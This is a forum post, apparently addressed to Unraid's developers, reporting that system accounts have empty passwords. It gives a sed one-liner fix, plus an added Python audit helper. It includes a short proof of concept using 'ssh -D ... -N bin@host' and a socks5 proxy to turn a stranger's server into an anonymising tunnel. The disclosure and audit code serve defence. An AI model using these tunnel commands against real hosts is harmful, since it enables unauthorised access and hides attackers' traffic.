No passwords for system users - unraid can be used as a rogue ssh tunnel


Mihai


Hello guys,

I couldn't find any proper channels for announcing vulnerabilities, so I think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.

Upon looking at some logs I noticed:

```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2```

Then after I took a close look at /etc/shadow I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:

```
$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.
$
```

But most troublesome, and maybe you guys are not aware of this: in order to open an ssh tunnel you don't need an actual shell.

```
$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0 127.0.0.1:3129          0.0.0.0:*               LISTEN      1658854/ssh
```

Voila! Then you have an ssh tunnel opened.

For now I patched my box, but of course it won't survive the reboot.

An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`

Cheerio,

Mihai

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )

```
[root@taicasimaica ~]# curl -ks4 showip.net
124.122.71.51
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N bin@x.ninja -p 7127
The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129
[root@taicasimaica ~]# curl -ks4 showip.net
91.82.91.172
[root@taicasimaica ~]#
```

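A field-aware version of the audit and fix described in the post, added here as an example that is not part of the original post or of Unraid: it lists accounts whose /etc/shadow password field is empty (the condition sshd reports as "Accepted none" when empty passwords are permitted), produces the locked form of the file (same effect as the sed one-liner above, but only ever touching the password field), and pulls "Accepted none" logins out of sshd log lines. The shadow contents and the log line are constructed samples.

```python
"""Audit /etc/shadow for passwordless accounts and flag sshd 'Accepted none' logins."""
import re
from typing import List, Tuple

# Constructed sample of /etc/shadow content (hashes are placeholders, not real).
SAMPLE_SHADOW = """root:$6$saltsalt$hashhashhash:18300:0:99999:7:::
lp::18300:0:99999:7:::
news::18300:0:99999:7:::
nobody:!:18300:0:99999:7:::
mihai:$6$abc$def:18300:0:99999:7:::
"""


def passwordless_accounts(shadow_text: str) -> List[str]:
    """Return usernames whose /etc/shadow password field (field 2) is empty.

    An empty field means 'no password required'; '!', '!!' or '*' mean locked.
    """
    names = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            names.append(fields[0])
    return names


def lock_passwordless(shadow_text: str) -> str:
    """Return the shadow content with every empty password field set to '!!'.

    Unlike a regex over the whole line, this never touches the date fields.
    """
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            fields[1] = "!!"
        out.append(":".join(fields))
    return "\n".join(out) + ("\n" if shadow_text.endswith("\n") else "")


# Matches the sshd line quoted in the post; 'none' is the auth method name.
ACCEPTED_NONE = re.compile(r"sshd\[\d+\]: Accepted none for (\S+) from (\S+) port \d+")


def accepted_none_logins(log_text: str) -> List[Tuple[str, str]]:
    """Return (user, source_ip) pairs for sshd logins that used 'none' auth."""
    return [(m.group(1), m.group(2)) for m in ACCEPTED_NONE.finditer(log_text)]
```

Run `passwordless_accounts` over the real file as root to see which system accounts would be affected before locking them.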